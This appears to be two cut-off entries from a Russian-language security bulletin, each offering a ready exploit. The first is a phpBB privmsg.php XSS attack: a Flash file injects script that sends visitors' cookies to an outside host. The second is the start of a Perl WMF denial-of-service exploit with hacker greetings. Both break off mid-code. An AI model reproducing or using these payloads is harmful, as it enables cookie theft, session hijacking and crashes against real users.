Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в phpBB.
Компьютер для продвинутых пользователей В этом выпуске: phpBB ПО: phpBB Уязвимость: Ввод данных в privmsg.php не проверяется до выполнения пользователем. Это может быть использовано для вставки HTML или скрипт-кода, которые смогут похитетть куки пользователя. Использование: Создаём Shockwave Flash файл с кодом: var username:String = "user_that_doesnt_exist"; var subject:String = "Xss Exploitation"; var message:String = "</textarea><script>document.location= 'http://site.com/cookie.php?c' + document.c...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Exploits.
Компьютер для продвинутых пользователей В этом выпуске: Explorer ПО: WMF Exploit: !/usr/bin/perl # WMF 0-day Dos Exploit # Exploit Coded by Vampire (Form Iran) # Contact : Vampire_Chiristof@yahoo.com # Bug Found by Orbital # Gr33tz To : Spy , l0pht.blackhat , Samir , Scorpino y4nliz and All Iranian Hackers and Programmers ! # Contact : orbital_q3nius@yahoo.com # Coded In Perl , PHP , Python # the C version written but Still priv8 print \nWMF Denial of Service Exploit by Vampire in PHP , PERL , PYTHON , C";...